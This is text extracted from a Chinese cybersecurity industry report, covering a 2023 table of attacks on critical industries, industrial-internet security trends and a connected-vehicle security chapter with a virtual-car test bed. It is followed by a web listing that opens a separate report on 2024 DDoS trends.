其美国销售子公司遭遇勒索攻击美国制造业BlackByte 勒索攻击未知6施耐德电气和西门子能源成为MOVEit 漏洞的最新受害者德国/法国供 应 链/制造业CL0P 勒索攻击未知6加拿大能源巨头 Suncor 遭受网络攻击加拿大能源网络攻击全国 1500 余家加油站支付服务受到影响。网络安全2024-守初心 创新质绿盟版3-13排版.indd 93网络安全2024-守初心 创新质绿盟版3-13排版.indd 932024/5/8 17:43:112024/5/8 17:43:11094网络安全 2024:守初心 创新质月份事件国家/区域行业/系统攻击类型后果6台积电遭 LockBit 勒索软件勒索中国台湾制造业LockBit 勒索软件攻击服务器的配置和设置信息被窃取,被索要 7000 万美元赎金7日本名古屋港口控制系统遭受攻击日本交通运输LockBit 勒索攻击数据加密,集装箱运营受到影响。7俄罗斯国有的铁路公司 RZD 网站据称被乌克兰黑客攻陷俄罗斯交通运输网络攻击网站和移动应用程序瘫痪至少 6 小时,只能线下购票。7美国科罗拉多州工业巨头盖茨公司受到勒索软件攻击美国制造业勒索软件攻击公司服务器被加密并泄露了超过 11000 名工作人员的信息7挪威再生资源回收和矿业公司陶朗集团遭受“大规模”网络攻击挪威矿业网络攻击直接影响了公司的部分数据系统8美国矿业巨头自由港麦克莫兰铜金公司遭网络攻击美国矿业网络攻击生产受到部分影响。8美国芝加哥贝尔特铁路公司遭遇勒索软件攻击美国交通运输Akira 勒索软件攻击勒索团队称窃取了 85GB 的数据。8以色列 Neve Neeman 核反应堆数据库遭数据泄露以色列能源未知窃取包括官员和教授的隐私信息和 10GB 机密文件数据集。8美国能源公司遭恶意二维码网络钓鱼攻击美国能源网络钓鱼未知8日本钟表制造商精工(Seiko)遭受勒索攻击日本制造业BlackCat 勒索攻击共 6 万条个人数据遭泄露8乌克兰加油站遭网络攻击致网站瘫痪乌克兰能源网络攻击三家加油站的网站服务中断。乌克兰 200 多个加油站陷入瘫痪8波兰铁路广播网络疑遭攻击致火车延误波兰交通运输网络攻击触发了列车的紧急停车功能,多量火车紧急停止数小时。8加拿大第二大城市电力系统遭勒索攻击加拿大能源LockBit 勒索攻击数十个项目文件被公开,委员会拒付赎金,选择重建 IT基础设施。9ORBCOMM 遭遇勒索软件攻击,导致货运车队管理中断美国交通运输勒索攻击货运车队管理中断。9乌克兰某能源基础设施遭 Fancy Bear 攻击乌克兰能源钓鱼邮件攻击安全人员阻止了此次攻击活动9伊朗黑客利用 Zoho 和 Fortinet 关键漏洞入侵美国航空组织美国航空APT 攻击未知9越南石油建设股份公司(PVC)成员公司 JSC(PVC-MS)数据遭泄露越南能源勒索软件攻击勒 索 软 件 团 队 称 泄 露 其300GB 数据。9空客公司敏感数据泄露法国航空黑客入侵3,200 家供应商的数据被泄露9间谍组织 Redfly 入侵了亚洲的一国家电网组织长达 6 个月亚洲能源恶意软件攻击内网凭证被窃取,内网的多台计算机被安装键盘记录器。9新西兰奥克兰交通局的 HOP 卡遭遇重大网络攻击致票务系统部分瘫痪新西兰交通运输网络攻击/勒索软件攻击充值和其他服务中断9伊 朗 国 家 黑 客 组 织 Peach Sandstorm 攻击全球卫星和国防组织全球国防、制造业数据窃取入侵全球数千组织9加拿大航空 Flair 员工信息泄露数月加拿大航空网络攻击部分员工的个人信息和记录文件被盗。9Alphv 勒索软件组织称入侵全球汽车和其他车辆音频和视频设备制造商 Clarion日本制造业Alphv 勒索软件攻击敏感数据被盗,其中包括合作伙伴的文件。网络安全2024-守初心 创新质绿盟版3-13排版.indd 94网络安全2024-守初心 创新质绿盟版3-13排版.indd 942024/5/8 17:43:112024/5/8 17:43:11095新技术发展篇月份事件国家/区域行业/系统攻击类型后果9国际自动化巨头江森自控遭勒索软件攻击致部分运营中断美国制造业Dark Angels 勒 索 攻击公司多个设备被加密,影响其运营,被索要 5100 万美元。10摩根先进材料遭到网络攻击英国制造业网络攻击部分服务器离线10Cyber Av3ngers 黑客组织声称获得了以色列一家污水处理厂控制系统的访问权限以色列市政Cyber Av3ngers 组织CyberAv3ngers 宣称控制工厂控制和监控系统访问权限,具体影响未知。10英国电力和数据制造商 Volex 遭网络攻击英国制造业网络攻击股价下跌了 4%左右。10巴勒斯坦和以色列的黑客活动分子对 scada 和其他工业控制系统进行攻击加沙地区未知网络攻击数百个工业控制系统(ICS)被暴露10美国大型建材生产商辛普森制造公司的信息技术基础设施和应用程序遭受网络攻击美国制造业网络攻击影响公司信息技术基础设施和应用程序,公司某些业务运营中断。10黑客组织 Cyber Av3ngers 宣称关闭 200 个以色列加油站以色列能源Cyber Av3ngers 组织导致以色列 200 个汽油泵关闭,进而导致特拉维夫和海法等地多个加油站关闭10MATA 框架攻击东欧石油和天然气公司东欧能源APT 攻击对石油和天然气行业以及国防工业的十几家东欧公司的攻击。具体影响未知10知名电子计算器制造商卡西欧数据泄露日本制造业黑客入侵窃取了来自 149 个国家客户个人信息的数据库。10曼彻斯特机场、盖特威克机场等遭受 UserSec 网络攻击由英国航空DDoS 攻击曼彻斯特机场网站关闭,运营和航班未受影响。11日本航空电子公司服务器遭网络攻击日本航空网络攻击部分系统暂停使用,电子邮件收发延迟。11波音公司零部件和分销业务遭受疑似 LockBit 勒索软件攻击美国航空勒索软件攻击窃取敏感数据,影响零部件和分销业务。11DP World 澳洲公司遭网络攻击,数千集装箱滞留码头。澳大利亚交通运输网络攻击扰乱了其港口的陆路货运业务,大约 3 万个集装箱滞留港口11巴黎都市区省际净水联合会遭到疑似勒索软件的攻击,被迫断开所有外部连接。法国市政网络攻击/勒索攻击 被迫断开所有外部连接,干扰近千万人的污水处理。11美国核研究实验室爱达荷国家实验室(INL)的人力资源数据遭泄露美国能源黑客入侵数十万条人力资源数据被泄露。11斯洛文尼亚的能源供应受到勒索软件病毒的威胁斯洛文尼亚能源勒索攻击信息系统数据被加密,交易系统、火灾报警系统异常,要求 100 万美元的赎金。11美国宾州阿里奎帕市市政供水系统遭到黑客组织部分控制。美国市政网络攻击增压水泵遭受入侵11台湾中国石化遭 BlackCat 勒索软件组织攻击中国台湾能源勒索软件攻击泄露的数据大小为 41.9GB11美国北德克萨斯市政水区遭勒索攻击,大量敏感数据遭窃取美国市政DAXIN 勒索攻击窃取超过 33,000 个包含客户信息的文件。部分业务中断。11俄罗斯联邦航空运输局遭乌克兰情报部门黑客入侵俄罗斯航空黑客入侵大量机密文件被盗。12韩国指控朝鲜黑客组织 Andariel从韩国国防公司窃取敏感国防机密韩国国防勒索软件攻击/数据泄露黑客窃取了 1.2TB 的数据,包括有关先进防空武器的信息。12梅奥爱尔兰的供水系统遭网络攻击爱尔兰市政网络攻击导致 180 户人家缺水。12美国海军造船商 Austul USA 遭到勒索软件攻击美国国 防/制 造业勒索软件攻击泄露了被盗信息。其它影响未知。网络安全2024-守初心 创新质绿盟版3-13排版.indd 95网络安全2024-守初心 创新质绿盟版3-13排版.indd 952024/5/8 17:43:112024/5/8 17:43:11096网络安全 2024:守初心 创新质月份事件国家/区域行业/系统攻击类型后果12亲以黑客组织 Predatory Sparrow再袭伊朗,加油站服务遭大范围打击伊朗能源Predatory Sparrow组织伊朗约 70%的加油站服务中断。12俄罗斯水务公司 Rosvodokanal 遭受了乌克兰黑客组织 Blackjack 的网络攻击。俄罗斯市政网络攻击6000 多台电脑被攻击,50tb的数据被删除。12勒 索 软 件 组 织 声 称 日 产 汽 车NISSAN 100Gb 数据被盗澳大利亚/新西兰制造业Akira 勒索软件攻击窃取了 100gb 文件和员工信息数据12Cyber Av3ngers 以 5BTC 的 价 格提供 1TB 的所谓以色列电力数据以色列能源Cyber Av3ngers 组织数据泄露3.6.2 政策和市场党中央、国务院高度重视工业互联网发展,自 2018 年以来,工业互联网已连续六年写入政府工作报告。报告指出,支持工业互联网发展,有力促进了制造业数字化智能化。2023 年是工信部印发工业互联网创新发展行动计划(2021-2023 年)的收官之年,我国工业互联网发展已全面融入了 45 个国民经济大类,具有影响力的工业互联网平台达到了 240 个。“5G 工业互联网”发展已进入快车道,一大批国民经济支柱产业开展创新实践,全国“5G 工业互联网”项目超过 4000 个。工业互联网快速发展使得网络安全的保障性作用日益凸显,工信部为推进工业互联网安全标准体系研究发布了工业互联网安全标准体系(2021 年)。在工业互联网持续上云的趋势下,企业对网络安全自发性需求逐渐激发,配合相关单位基本建成国家级工业互联网安全技术监测服务体系,覆盖能源、汽车、电子等关键行业和平台,初步实现工业互联网安全态势可感可知。值得关注的是,ChatGPT 等人工智能技术的出现,推动我国走向工业 AI 应用的新时代。人工智能可以贯穿工业互联网的多个应用场景,为多元化的工业互联网应用提供更加智能化的解决方案,展现出广阔的发展前景。但这也给工业互联网带来了新的网络安全风险,可能会颠覆和挑战传统的网络安全防护模式,因此,工业互联网安全产业正在经历快速增长和变革。根据 Future Market Insights 研究,工业网络安全市场在(2023-2033 年)的预计年复合增长率为 7.8%,预计到 2023 年,全球工业网络安全市场的规模为 223.6 亿美元,预计到2033 年将达到 469.6 亿美元。网络安全2024-守初心 创新质绿盟版3-13排版.indd 96网络安全2024-守初心 创新质绿盟版3-13排版.indd 962024/5/8 17:43:112024/5/8 17:43:11097新技术发展篇图 3.19 工业网络安全市场预测(2023-2033 年)电力、市政等与关键信息基础设施相关的工业网络安全是市场增长的主要驱动力。回望即将过去的 2023 年,全球地缘政治持续紧张,通过网络打击对方基础设施已屡见不鲜。这加快了各国政府和企业对关基安全能力的升级。根据公开数据,截止到 11 月份工业安全企业投融资数量有 14 起,工业安全赛道依然受资本青睐。表 3.4 2023 年 1-11 月工业安全企业投融资情况序号时间投融资企业金额融资轮次12023 年 1 月六方云未披露C 轮2烽台科技2.5 亿元B 轮3天地和兴未披露D 轮4珞安科技未披露C 轮5丈八网安数千万A 轮6云天安全1.22 亿人民币A 轮72023 年 2 月观安信息3 亿元战略投资82023 年 5 月齐安科技未披露B 轮92023 年 6 月烽台科技1.2 亿元B 轮10力控科技未披露B 轮112023 年 11 月长扬科技未披露G 轮12国泰网信未披露战略投资132023 年 11 月圣博润6000 万人民币战略融资142023 年 11 月中电安科未披露A 轮3.6.3 发展趋势1.自主创新,加快了安全与业务场景相结合的定制化需求。工业互联网涉及多个垂直行业,渗透国民经济 45 个行业大类,不同行业应用的需求差异较大,这使得同质化的安全产品难以解决实质问题。无论是合规要求还是自身业务考量,企业迫切需要定制化的安全产品和服务,适用于自身的业务场景。经多年发展,我国工业互联网借鉴和吸收国外先进技术和创新理念,凭借其制造业和数字经济的优势,走出特有的技术体系和运营模式,逐渐摆脱核心技术受制于人,技术自主化程度低的问题,具备了信息安全网络安全2024-守初心 创新质绿盟版3-13排版.indd 97网络安全2024-守初心 创新质绿盟版3-13排版.indd 972024/5/8 17:43:122024/5/8 17:43:12098网络安全 2024:守初心 创新质要素与业务深度融合的能力。未来安全厂商、信息化厂商、工业企业都将会重点培养“知业务、懂安全”的力量,安全与工业互联网业务紧密结合,推动场景定制化的安全浪潮。2.数据安全成为常态化工作,技术创新将数据安全推向独立发展路线。数据安全是工业互联网安全体系的重要一环。工业企业上云和工业数据连接规模扩大,数据体量不断增加,工业互联网需要对海量多类型多源头的数据进行集成和处理。工业数据面临非授权访问、数据篡改、数据泄露、用户隐私泄露等安全威胁。未来在数据安全相关法律及标准的推动下,一方面工业企业会提升对数据安全重要性的认知,围绕“分类施策、分级管理”等基本原则建立数据安全管理体系,将数据安全管理转变为常规基础性工作。另一方面通过数据安全关键技术上的不断突破与创新,产品种类越来越丰富。数据安全技术将从传统网络安全技术中脱离,走向专业化体系化的发展路线。3.工业互联网边缘设备的潜在风险,攻击将更注重工业互联网边缘设备的突破与控制。5G、物联网、云计算技术的快速发展,增加大量的工业互联网边缘设备,这些边缘设备将工业企业遗留的老旧系统打通,实现数据的收集、处理和传输,在多个行业发挥着承上启下的关键用途,并逐渐具备更强的计算能力向智能化发展。工业互联网边缘设备在提供便利的同时,使得工业互联网的边界变得更为模糊,这为攻击者提供了新的入口点。未来工业互联网边缘设备将成为黑客攻击的首要目标,此类设备更容易被获取和研究,漏洞通用性强,利用价值高,获取到一台边缘设备的访问权限就可用作立足点来访问同一网络的其他设备,突破整个大网的安全防线,也可直接修改控制逻辑,造成物理或人员的伤害。3.7 车联网安全据公安部 2024 年 1 月 11 日统计,截至 2023 年底,全国机动车保有量达 4.35 亿辆,其中汽车3.36亿辆;机动车驾驶人达5.23亿人,其中汽车驾驶人4.86亿人。伴随汽车的逐步普及,车联网在十年内经历了巨大的技术变革,汽车智能网联功能已成为当前新车标配,百姓对汽车功能的需求越来越多元化,提供座舱娱乐、自动驾驶等功能的新型汽车部件日趋成熟,多种汽车电子电气架构随之涌现。然而,汽车网联化也带来了更多的安全风险。云端业务系统漏洞、数据泄露事件被频繁披露,车端复杂的功能带来了更多的攻击面,严重的远程控车漏洞和近场通信漏洞频现,犯罪分子甚至通过黑客发布的开源工具对汽车展开偷窃,拆解汽车后买卖零部件以获利。目前看来,汽车、车主个人信息和轨迹,是未来几年内汽车黑客的重要目标。网络安全2024-守初心 创新质绿盟版3-13排版.indd 98网络安全2024-守初心 创新质绿盟版3-13排版.indd 982024/5/8 17:43:122024/5/8 17:43:12099新技术发展篇为方便读者更清晰地从技术上理解车联网安全态势,本章就车联网技术现状、技术创新、技术趋势这三点展开讨论车联网安全新技术态势。3.7.1 技术发展现状漏洞挖掘的成果,即为攻击方法或者工具,也是当前黑客关注的焦点。具备高智能化的中高端汽车,其车主个人信息与资产是黑客和犯罪分子关注的焦点。所以,本节就车联网漏洞挖掘技术和车联网数据安全技术这两方面展开阐述。汽车云端的漏洞挖掘对象与传统的互联网云端服务基本类似,大多数是对 WEB、数据库、认证登录、邮件收发、文件传输、MQTT 等多类服务进行漏洞挖掘,进而获取管理员权限或关键业务系统数据。汽车的业务系统内部,存在车主个人信息、汽车轨迹等敏感信息,这些信息黑客是如何获取的呢?汽车的轨迹需要汽车上传自身定位信息和车主信息到云端,所以,传输敏感信息的服务是被关注的焦点之一。以 MQTT 服务为例,当手机程序或者汽车启动时,部分汽车云依托MQTT 服务上传当前汽车的状态信息到云端,此时,黑客可以通过逆向手机程序和汽车内部的固件,来获取登录 MQTT 平台的口令,进而以“合法”的身份加入 MQTT 的推送、订阅的机制中,相当于加入“群聊”进行旁听,群里每个汽车回上传自己的身份 ID 以及位置信息,甚至回附加车主信息。在车端,犯罪分子可以通过破解汽车的无线钥匙,将钥匙的认证信号复制到无线电设备中进行重放,可以偷走部分没有滚动码认证,或者滚动码算法较弱的汽车。车联网数据安全是实现车联网数据运营的前提保障,这部分工作需要分两步走。数据分级分类是数据安全保障的重要基础,也是数据治理的第一步。数据分类上,面向自身业务,聚焦对象主体进行划分,包括车辆运行数据、环境数据、个人数据等,或聚焦业务流程进行划分,包括车辆数据、研发数据、运维数据等,在大类划分下,依据业务及应用场景继续向下细分类别;数据分级上,分级明确、就高从严进行数据级别确定;数据安全保障方面,各类型企业均面向自身业务构建形成一套较为完善的数据安全保障体系,具体围绕组织建设、制度流程规范和技术支撑体系等方面展开。第二步,是使用隐私保护、数据脱敏、数据溯源等技术多方面保障数据安全合规。如何在保证数据安全和个人隐私安全的前提下实现数据流通,激发数据潜能,发挥数据价值,成为了当前车联网发展的一个挑战。隐私计算技术可以实现“数据可用不可见”,使数据“不出库”就能实现模型构建、模型预测、身份认证、查询统计等能力,将极大的丰富车联网生态的应用天地。在自动驾驶模型构建过程中,需要用到海量数据参与计算,甚至包括普通车网络安全2024-守初心 创新质绿盟版3-13排版.indd 99网络安全2024-守初心 创新质绿盟版3-13排版.indd 992024/5/8 17:43:122024/5/8 17:43:12100网络安全 2024:守初心 创新质主行驶时的数据,自动驾驶的模型构建过程可基于隐私计算技术,实现各车端原始数据不出域情况下的模型构建。模型构建好以后,在车主的行为预测(如语音指令)过程中,可基于隐私计算技术,实现车端原始数据不出域情况下的模型预测。隐私保护方面,利用同态加密、联邦学习、安全多方计算等技术,探索大模型联合训练,为车联网数据流通过程中隐私保护提供新思路;数据脱敏方面,利用人工智能等技术对车外人脸、车牌数据进行脱敏处理,防止敏感信息泄露;数据溯源方面,基于区块链、数字水印等技术保障数据不可篡改、可溯源。3.7.2 技术发展创新汽车的单价多达数十万元,这本就为车联网安全研究带来巨大的成本压力,然而,疫情的到来,为其雪上加霜。车联网安全研究,如何解决成本问题,显然是各个企业,尤其是信息安全企业,要解决的第一个难题。有没有一种车联网安全的研究环境,可以不依赖任何硬件,或者依赖极少量必要的硬件而建立呢?绿盟科技通过技术创新,研究出虚拟汽车系统,使得汽车的电子电气架构,在零部件的操作系统和 CAN 总线通信两方面得以完全虚拟化,大大降低了汽车研究的环境成本。汽车虚拟化技术也是当前车联网安全领域的一大创新亮点。对汽车的虚拟化,本质上是对虚拟电子电气架构的虚拟化,涉及四方面的技术,分别为电子电气架构、汽车总线、虚拟化软件以及车内操作系统。由于 Linux 和 Android 这两类操作系统基本覆盖全车所有关键零部件的操作系统类别,所以,针对 Linux 和 Android 操作系统的零部件进行虚拟化,是虚拟汽车研究的核心。以往,T-BOX 和车机都会连接在信息域,站在网关的角度看,他们都在同一组 CAN 接口上相连。而在我们的架构中,为了最简单地描述电子电气架构的可定制性,我们将车机和 T-BOX 分开,放在两个不同的功能域。自动驾驶控制器连接到驾驶域中,这一点保持不变,如下图所示。网络安全2024-守初心 创新质绿盟版3-13排版.indd 100网络安全2024-守初心 创新质绿盟版3-13排版.indd 1002024/5/8 17:43:122024/5/8 17:43:12101新技术发展篇图 3.20 汽车虚拟电子电气架构首先,汽车的运行环境需要有 3D 车路的呈现,运行虚拟汽车的主机必须配备性能足够强的显卡,以满足车路效果的稳定呈现。其次,还需要具备方向盘和脚踏板这类外设,可以是实车移植过来的,也可以购买游戏类的。主机需要读取方向盘的按键编码数据,将控制类信号转发到 CAN 总线后,经由虚拟零部件,转化为前端汽车的控制数据,这一转化,经由“控制引擎”完成汽车的运动控制和车灯、车门等 ECU 的控制。对于信息安全而言,需要向汽车零部件中植入安全探针,如安全 SDK、Agent 等,以满足对汽车信息安全的实时监控。网络安全2024-守初心 创新质绿盟版3-13排版.indd 101网络安全2024-守初心 创新质绿盟版3-13排版.indd 1012024/5/8 17:43:122024/5/8 17:43:12102网络安全 2024:守初心 创新质图 3.21 虚拟汽车架构这样的虚拟汽车系统,它的实战表现如何呢?下面,我们从电子电气架构的视角,观察虚拟汽车被攻击的过程。首先,构造一个攻击环境,其次,把极光 001 看作真车,使用端口扫描、木马植入等方式进行攻击,最后核对攻击是否有作用。设计攻击环境时,攻击入口设置为两个,分别是车端入口和云端入口。其中,车端的攻击具体如下所示。左侧所示为驾驶员使用方向盘和脚踏板驾驶汽车,方向盘的控制信号经由宿主机转化为 CAN 信号,发送给VCU,VCU 将控制方向盘数据转化为前端车辆需要的转向、速度、刹车、倒车等信号,将信号发送给 CAN 转 Unity 的协议转换模块,最后经 Unity 引擎时车辆在车路上驾驶。这其中所有的控制经 CAN 总线。车载以太网方面,宿主机连接外部 Wi-Fi 路由器,QEMU 使用桥接技术将启动的虚拟零部件桥接到 Wi-Fi 路由器下,与宿主机共享一个网段,其中,外部 Wi-Fi 路由器可被当做车辆热点来看待,攻击者接入热点后可对汽车零部件发起攻击。网络安全2024-守初心 创新质绿盟版3-13排版.indd 102网络安全2024-守初心 创新质绿盟版3-13排版.indd 1022024/5/8 17:43:122024/5/8 17:43:12103新技术发展篇图 3.22 热点下攻击虚拟汽车的场景具体的攻击流程为:首先,攻击者接入汽车热点;然后,在热点下对汽车发起主机扫描、端口扫描、弱口令爆破、服务利用等攻击;最后,在获取主机权限后,对零部件发起攻击,如使用 ADB 服务控制车机的空调按钮控制空调,或者发送 CAN 报文实现控车效果。具体如下图所示。网络安全2024-守初心 创新质绿盟版3-13排版.indd 103网络安全2024-守初心 创新质绿盟版3-13排版.indd 1032024/5/8 17:43:122024/5/8 17:43:12104网络安全 2024:守初心 创新质图 3.23 热点下攻击虚拟汽车的流程除了可以对其进行攻击以外,虚拟汽车还可以被作为运行汽车应用程序的环境来模拟汽车业务。在零部件的模拟过程中,使用的是 QEMU 启动的 ARM64 架构的 Linux 系统零部件,所以,一些使用该架构的实车中的零部件应用,也可以迁移到虚拟零部件中运行。最为基础的操作为,将实车零部件的根 Linux 文件系统迁移到虚拟零部件中,运行 chroot 命令切换到实车的固件环境下,运行需要被模拟的应用。具体如下图所示。应用程序名为“mv_app”的应用经过虚拟零部件启动后,与真实零部件环境下的表现一致,这个“一致”体现在两方面,分别是网络侧监听的端口一致,和对 CAN 总线的控制、收发消息的逻辑一致。网络安全2024-守初心 创新质绿盟版3-13排版.indd 104网络安全2024-守初心 创新质绿盟版3-13排版.indd 1042024/5/8 17:43:122024/5/8 17:43:12105新技术发展篇图 3.24 虚拟汽车运行实车业务的效果对监听的端口和应用,可以进行逆向分析、流量抓取等方式进行漏洞挖掘,对 CAN 总线消息的收发,可以分析车内网总线控车逻辑。利用前者,攻击者可获取零部件权限;利用后者,攻击者可以明确控车报文对部分车辆功能进行控制。从攻击角度看,虚拟汽车可以支撑汽车靶标的角色,其在虚拟电子电气架构、虚拟汽车零部件、虚拟车内网通信这三个方面与发售的汽车几乎一致。固件模拟执行和业务复现,在虚拟汽车上表现不错,也可达到多零部件联动仿真的效果。虚拟汽车的实现只是第一步,未来,还需要将道路交通的虚拟化纳入其中,使车联网安全研究即更加高效,也更“接地气”。3.7.3 技术发展趋势未来车联网发展有两个大技术方向,其一,是由国家交通战略推动的车路协同技术(V2X),其二,是由用户需求推动的自动驾驶技术(本节自动驾驶指的单车智能)。车路协同的实现,需要智能交通系统作为基建来支撑,是缓解交通拥堵和保证交通安全的重要技术手段。自动驾驶是基于各种感知信息,通过人工智能技术进行决策和车辆控制实现的,在一定程度上本身单车即可实现自主性1。伴随着车路协同产业链的逐步丰富2,和区域示范区的建立,车路协同和自动驾驶技术也将逐渐落地。针对车路协同,我们讨论两个方面的趋势,其一,是 V2X 网络架构下的一些脆1车路协同自动驾驶发展报告,https:/img.wtc- 年中国车路协同行业市场现状,https:/ 创新质绿盟版3-13排版.indd 105网络安全2024-守初心 创新质绿盟版3-13排版.indd 1052024/5/8 17:43:132024/5/8 17:43:13106网络安全 2024:守初心 创新质弱点,其二,是 V2X 网络下用户隐私信息保护。在 V2X 网络中存在车、路侧单元(RSU)、基站(eNB)、应用服务器和其他 LTE 网络设备,其中,应用服务器可作为计算设备采集、分析摄像机、激光雷达、毫米波雷达等多个传感器信息以共享路况。LTE/5G 接入网和核心网的安全性本节不做赘述,处于边缘侧和端侧的 RSU、汽车、服务器、摄像头等会成为攻击者攻击的对象。一方面,这些设备的操作系统为 Linux、Android 等,攻击者攻击类操作系统所使用的手段相对成熟;另一方面,攻击者攻击到这些节点后,可以篡改这些设备生成的各类数据,以欺骗 V2X 网络中的其他节点,使其“谎报军情”,以达到攻击的目的。V2X 网络中各个单元之间的交互可如下图所示。图 3.25 V2X 通信网络结构在 V2X 网络下,车辆需要共享位置信息给路侧和其他车辆,用户的隐私信息存在一定的安全隐患,用户隐私信息泄露的担忧可能会为其发展带来一定的阻碍。研究表明,用户选择是否同意将隐私数据共享时考虑的因素中,自身利益,尤其是安全性,是放在第一位的1。所以,在车路协同基础技术建设完成后,第一项进一步的工作,可能是需要加强对用户隐私的保护,使更多的用户“同意”将自己的汽车加入 V2X 的“群聊”而确保不被旁听或泄密。自动驾驶技术,从结构上看,大体可分三个部分,分别是感知层,计算决策层和执行层。顾名思义,感知层收集摄像头、雷达的数据,供计算决策层分析路况,当路况信息分析完成,需要对汽车下一刻行为做出决策,比如刹车、变道、加速等。计算决策层是自动驾驶的“脑”,1Understand UsersPrivacy Perception and Decision of V2X Communication in Connected Autonomous Vehicles,https:/www.usenix.org/system/files/sec23fall-prepub-346-cai-zekun.pdf网络安全2024-守初心 创新质绿盟版3-13排版.indd 106网络安全2024-守初心 创新质绿盟版3-13排版.indd 1062024/5/8 17:43:132024/5/8 17:43:13107新技术发展篇所以本节将重点分析计算决策层的安全性。为“脑”提供算力的是自动驾驶控制器,代表芯片厂商为英伟达和 AMD,尤其是英伟达,已在理想、未来、比亚迪等多个厂商高端汽车中装配。从英伟达提供的白皮书1可知,该控制器使用的是 Linux 或者 QNX 操作系统,系统之上为传感器、神经网络、车辆硬件抽象等库,进而基于各类软件算法,实现路径规划、L2 级别自动驾驶、自动泊车等自动驾驶功能。从系统层看,该控制器可以存在 SSH、TELNET 等具备 Linux 操作系统管理属性的服务,该控制器一旦被获取权限,整车“大脑”即被控制。从应用层看,各种应用层输入的传感器数据、产生的分析结果数据、输出的控车执行命令都将影响汽车的驾驶,黑客可以通过这类数据以影响、控制汽车的驾驶。图 3.26 英伟达自动驾驶控制器软件结构未来,单车智能级别的自动驾驶普及后,单车智能与车路协同会形成一体,形成高级别的交通模式,其网络安全风险也将随之聚合,用户隐私也将进一步对外暴露,单车漏洞可造成的威胁也将扩散到整个 V2X 网络范围。构建 V2X 产业链的过程中,建议将基础夯实的网络安全厂商也纳入其中,对 V2X 的网络做整体的信息安全防护设计,以减少自动驾驶和车路协同落地后,信息安全漏洞带来的威胁。1NVIDIA DRIVE,https:/ 创新质绿盟版3-13排版.indd 107网络安全2024-守初心 创新质绿盟版3-13排版.indd 1072024/5/8 17:43:132024/5/8 17:43:1304总结网络安全2024-守初心 创新质绿盟版3-13排版.indd 108网络安全2024-守初心 创新质绿盟版3-13排版.indd 1082024/5/8 17:43:132024/5/8 17:43:13109总结受全球关联外部影响因素日益复杂影响,网络安全态势从国家、社会、企业组织多个层面呈现出瞬息万变的形势,网络安全的竞争格局也从传统攻防双边关系不断蔓延融合业务、法律、军事、技术因素,形成需要平衡质量、安全、发展乃至经济、政治的多边关系。实现安全目标于当前态势情形下,也不再单纯只需要考虑既有业务的维持与信息化安全,还需要考虑局部争端下行业与产业安全问题,以及在数字化、智能化不断推进革新的时代大背景下,如何保持长期竞争力,考虑关乎组织机构未来可持续发展的转型问题。及时掌握国际网络安全态势,有效进行网络安全建设,对于组织机构实现安全稳定发展至关重要。于未来,我们相信平衡安全与发展的态势不变。既要保证产业自身健康有序发展,做大做强,同时也要防止垄断发生;既要鼓励企业发展国际市场,但围绕国家安全进行的自主可控、出境合规的底线必须坚守。我们也相信组织机构积极融入国家高效安全治理体系建设的态势与价值不变,因为提升国家治理体系与治理能力是各行业共同鼓励的目标,行业自身需要努力创新、不断进取,这也是实现组织机构多方面、深层次高质量发展的必由之路。网络安全2024-守初心 创新质绿盟版3-13排版.indd 109网络安全2024-守初心 创新质绿盟版3-13排版.indd 1092024/5/8 17:43:142024/5/8 17:43:14

    浏览量45人已浏览 发布时间2024-05-15 115页 推荐指数推荐指数推荐指数推荐指数推荐指数5星级
  • 快快网络:2024年DDoS攻击趋势白皮书(30页).pdf

    快快网络 2024 年 DDoS 攻击趋势白皮书快快网络 2024 年 DDoS 攻击趋势白皮书1/29摘要摘要就分布式拒绝服务(DDoS)攻击趋势而言,2023 年是具有里程碑意义的一年。网络犯罪集团、出于地缘政治动机的黑客活动分子和恶意行为者利用物联网(IoT)设备构建的大规模僵尸网络以及协议级零日漏洞,对企业、政府机构以及关键但脆弱的公共基础设施(包括医院)发起了破纪录的 DDoS 攻击。在整个 2023 年,DDoS 攻击变得更加频繁、持续时间更长、复杂程度更高。其中,银行和金融服务行业是最具针对性的垂直行业。针对这些行业的攻击通常旨在造成声誉损害,或分散安全专业人员的注意力,以发动 DDoS 勒索软件混合攻击。DDoS 攻击事件愈演愈烈,成为互联网最大的网络安全威胁之一,让企业面临的网络安全风险与日俱增。通过快快网络 DDoS 团队检测数据显示:2023 年中国遭受 DDoS攻击次数达 146 万,占全球 11.74%,游戏行业仍然是受影响最严重的行业,遭受了 46%的攻击。金融行业位居第二,占 22%。电信(18%)、基础设施服务行业(7%)和计算机软件公司(3%)也成为重点目标。快快网络带来了 2024 年 DDoS 全球攻击趋势专项报告,与您分享 DDoS 攻防态势的最新趋势。快快网络 2024 年 DDoS 攻击趋势白皮书2/29快快网络 2024 年 DDoS 攻击趋势白皮书4/291.20232023 年全球年全球 DDoSDDoS 攻击情况攻击情况1.11.1 全球攻击情况全球攻击情况2023 年 DDoS 攻击总次数 1246.61 万次,同比增长 18.1%。快快网络监测数据显示,2023 年中国遭受 DDoS 攻击次数达 146万,占全球 11.74%,排名第三,第一为美国占比 41.22%,第二为荷兰。在欧洲、中东、非洲(EMEA)和亚太(APAC)地区,DDoS 攻击的数量和规模已经与北美不相上下。图 1 2023年全球 DDoS 攻击情况数据显示,攻击者越来越多地瞄准关键基础设施和服务,包括物流服务、支付处理中心和银行系统,试图影响更多的用户。平均攻击强度达到 1.4Tbps 的峰值,最长的攻击持续了 7 天。越来越多的 DDoS 攻击开始使用僵尸网络,超过 38%的 DDoS 攻击利用了感染僵尸网络的设备。此外,与上一年相比,作为多向量攻击的烟幕弹/诱饵的 DDoS 攻击增加了 28%。更具破坏性的 HTTP 攻击正变得越来越容易实施。82.3%的 DDoS攻击针对 OSI 模型的应用层(L7),11.7%针对 OSI 模型的传输(L4)和网络(L3)层。2.3%的攻击针对 DNS,其余 3.7%针对其他目标。快快网络 2024 年 DDoS 攻击趋势白皮书5/291.21.2 攻击规模攻击规模DDoS 攻击的规模和复杂程度都在不断增长,但 2023 年以不可预见的速度加速了这一趋势。甚至连安全供应商及其各自的网站也受到了攻击。2023 年 7 月,出现高达 1990 Gbps(1.99 Tbps)和710 Mpps 的超大规模 DDoS 攻击。9 月份,快快网络发现并阻止了一场大规模 DDoS 攻击。在这起攻击中,网络犯罪分子使用了 ACK、PUSH、RESET 和 SYN 洪水攻击向量的组合,峰值为 1.6 Tbps。事实证明,这些攻击与 2022 年开始的“震慑式”DDoS 攻击趋势非常一致。图 2 2023年全球 DDoS 攻击峰值图 3 2023年全球 DDoS 攻击速度2023 年,快快网络就曾检测到一起创纪录的 